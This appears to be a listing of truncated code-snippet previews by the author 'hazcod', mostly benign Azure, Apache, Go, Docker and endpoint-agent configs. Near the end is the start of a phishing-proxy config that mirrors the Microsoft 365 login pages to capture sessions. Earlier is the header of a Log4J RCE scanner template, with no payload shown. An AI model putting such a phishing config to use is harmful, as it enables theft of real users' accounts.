hazcod

{
    "definition": {
        "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
        "actions": {
            "Condition": {
                "actions": {
                    "Terminate": {
                        "inputs": {
                            "runStatus": "Cancelled"
                        },

hazcod

id: CVE-2021-44228 

info:
  name: Log4J RCE
  author: iNvist / hazcod
  severity: critical
  description: CVE-2021-44228 

requests:
  - raw:

hazcod

This current configuration is based of at least Server Version 1.16.5.1488 and Web Version: 3.108.2.
This updated config file allows the playing of trailers and TV Show theme music where as the previous one did not.

## Requirements

1. Apache version > 2.4
2. A bunch of mod's enabled (proxy, ssl, proxy_wstunnel, http, dir, env, headers, proxy_balancer, proxy_http, rewrite)
3. Protocols h2 http/1.1 needs apachectl -V 2.4.17 and higher...

## Apache .conf file

hazcod

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "parameters": {
        "dataCollectionRules_OnePasswordLogs_name": {
            "defaultValue": "OnePasswordLogs",
            "type": "String"
        },
        "dataCollectionEndpoints_1password_externalid": {
            "defaultValue": "/subscriptions/SUBSCRIPTION-ID-HERE/resourceGroups/myresgroup/providers/Microsoft.OperationalInsights/dataCollectionEndpoints/1password",

hazcod

• Install the ZSH shell from SynoCommunity packages
• Connect to your Synology over SSH
• Switch over to your new ZSH shell zsh
• Set following parameter to allow detaching of our shell setopt NO_HUP
• Run your command using nohup and ampersand nohup <command> &
• Detach using CTRL+D or likewise

hazcod

#!/usr/bin/env bash

CLIENT_ID="_FALCON_API_CLIENT_ID_"
CLIENT_SECRET="FALCON_API_CLIENT_SECRET_"
CID="_FALCON_CID_"
TOKEN="_FALCON_INSTALL_TOKEN"
API_HOST="api.eu-1.crowdstrike.com"


function main() {

hazcod

{
  "options": {
    "disable_audit": false,
    "disable_events": false,
    "enable_mouse_events": false,
    "enable_keyboard_events": false,
    "events_max": 10000,
    "events_expiry": 3600,
    "read_max": 52428800,
    "logger_event_type": false,

hazcod

type TTLMap struct {
	TTL  time.Duration

	data sync.Map
}

type expireEntry struct {
	ExpiresAt time.Time
	Value	  interface{}
}

hazcod

FROM golang:alpine
RUN apk add --no-cache protobuf git \
  && go get github.com/golang/protobuf/protoc-gen-go \
  && cp /go/bin/protoc-gen-go /usr/bin/

# e.g. find proto -type f -iname '*.proto' -exec protoc -I proto/ --go_out go/ {} \;

hazcod

author: '@hazcod'
min_ver: '2.3.0'

proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}

sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}